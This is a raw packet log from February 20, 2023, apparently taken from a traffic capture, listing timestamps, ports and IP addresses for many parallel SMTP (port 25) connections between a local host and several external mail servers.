Feb 20, 2023 09:50:45.195791960 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.195889950 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.207849979 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.208035946 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.212750912 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.212908983 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.222176075 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.222234964 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.222367048 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.222462893 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.234599113 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.234781981 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.239622116 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.239782095 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.248889923 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.249015093 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.249105930 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.249228954 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.261432886 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.261657953 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.264297962 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.264636040 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.266508102 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.266680002 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.275531054 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.275703907 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.275768995 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.275919914 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.288232088 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.288410902 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.289880037 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:45.290762901 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:45.293395996 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.293540001 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.302020073 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.302167892 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.302418947 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.302524090 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.314939022 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.315073013 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.320202112 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.320372105 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.326853037 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.327250004 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.328551054 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.328722000 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.329013109 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.329161882 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.341600895 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.341841936 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.347096920 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.347307920 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.355160952 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.355648994 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.355664968 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.355818987 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.368448973 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.368671894 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.374073029 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.374291897 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.382044077 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.382287025 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.382323027 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.382489920 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.389472008 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.389815092 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.395220041 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.395313978 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.400975943 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.401125908 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.408663988 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.408801079 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.408993006 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.409116030 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.421942949 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.422080040 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.427800894 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.427947998 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.435245037 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.435457945 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.435667992 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.435808897 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.448622942 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.448977947 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.451767921 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.452111006 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:45.452130079 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.452892065 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:45.454683065 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.454883099 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.461807013 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.462038040 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.462272882 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.462466955 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.475490093 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.475778103 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.482052088 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.482199907 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.488409996 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.488586903 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.488931894 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.489068985 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.502963066 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.503144979 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.509285927 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.509413958 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.514313936 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.514620066 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.514889956 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.515036106 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.517458916 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.517591953 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.529706955 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.529886961 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.536109924 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.536298990 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.541397095 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.541569948 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.544173956 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.544325113 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.556387901 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.556591988 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.563098907 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.563270092 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.574425936 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.574548960 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.574609995 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.574788094 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.576704025 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.577013969 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.583118916 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.583290100 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.590389967 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.590704918 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.600965977 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.601174116 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.601254940 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.601409912 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.610006094 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.610161066 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.614224911 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:45.615000963 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:45.617455006 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.617559910 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.627751112 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.627863884 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.627964020 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.628154039 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.636760950 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.636918068 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.639311075 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.639606953 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.644305944 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.644475937 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.654218912 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.654398918 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.654894114 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.655049086 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.663477898 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.663647890 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.671201944 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.671394110 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.680727005 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.680932999 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.681564093 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.681727886 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.690136909 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.690359116 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.698157072 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.701216936 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.701733112 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.701971054 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.707299948 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.707499981 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.708240986 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.708372116 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.716911077 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.717068911 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.727961063 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.728101969 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.734054089 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.734325886 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.734869003 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.735025883 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.743717909 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.743907928 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.754923105 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.755084038 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.760848045 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.761002064 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.761533976 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.761679888 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.764146090 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.764406919 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.770432949 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.770584106 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.776279926 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:45.776910067 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:45.781826973 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.781966925 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.787391901 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.787509918 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.788139105 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.788256884 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.797215939 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.797386885 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.808625937 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.808785915 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.813898087 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.815272093 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.823882103 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.826642990 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.826950073 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.829628944 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.829632998 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.829716921 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.835517883 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.835612059 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.891469002 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.891496897 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.891515970 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.891645908 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.891738892 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.891832113 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.891839027 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.892014027 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.892141104 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.892296076 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.918344021 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.918370008 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.918387890 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.918778896 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.918904066 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.918943882 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.919400930 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.919426918 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.938370943 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:45.939018965 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:45.945384026 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.945425034 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.945540905 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.945674896 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.945913076 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.946024895 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.946027994 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.946146965 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.954643011 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:45.955060005 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:45.972073078 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.972105980 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.972349882 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.972527027 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.972682953 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.972793102 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.972894907 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.973058939 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:45.998855114 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:45.998964071 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.999108076 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:45.999304056 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.999322891 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:45.999509096 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:45.999624014 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:45.999850035 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.017256021 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.017719984 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.025675058 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.025810003 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.025959015 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.025991917 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.026137114 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.026289940 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.026577950 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.026762962 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.052654982 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.052726984 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.052831888 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.052905083 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.053021908 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.053180933 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.053474903 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.053654909 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.079637051 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.079710007 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.079762936 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.079833031 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.080216885 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.080219030 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.080380917 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.080605984 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.080625057 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.081013918 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.100614071 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:46.106479883 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.106719017 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.106789112 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.106837034 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.107115984 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.107153893 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.107322931 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.107508898 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.133450985 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.133757114 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.133761883 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.133826017 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.133949995 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.134120941 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.136179924 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.136415958 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.143213034 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.143676043 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.160393953 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.160511017 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.160676956 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.160705090 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.160824060 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.160979033 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.163151026 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.163383007 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.187433004 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.187485933 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.187612057 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.187695980 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.187908888 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.187984943 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.190190077 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.190404892 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.205619097 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.206079006 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.214323997 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.214416027 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.214509964 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.214608908 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.214867115 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.214914083 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.217360020 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.217564106 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.241319895 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.241445065 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.241467953 CET	25	49712	142.250.27.27	192.168.2.5
